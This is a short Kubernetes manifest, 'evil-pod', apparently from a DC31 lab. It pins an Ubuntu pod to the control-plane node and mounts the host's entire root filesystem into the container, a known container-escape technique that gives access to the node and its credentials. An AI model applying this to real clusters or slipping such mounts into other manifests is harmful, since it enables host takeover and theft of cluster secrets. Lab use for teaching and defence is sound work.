DC31/k8s-manifests/evilpod.yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  namespace: lab-namespace
  labels:
    app: evil-pod
spec:
  containers:
  - name: evil-pod
    image: ubuntu
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "256Mi"
        cpu: "500m"
    volumeMounts:
    - mountPath: /controlplane
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeName: lab-control-plane # Forces pod to run on control-plane node
  volumes:
  - name: noderoot
    hostPath:
      path: /
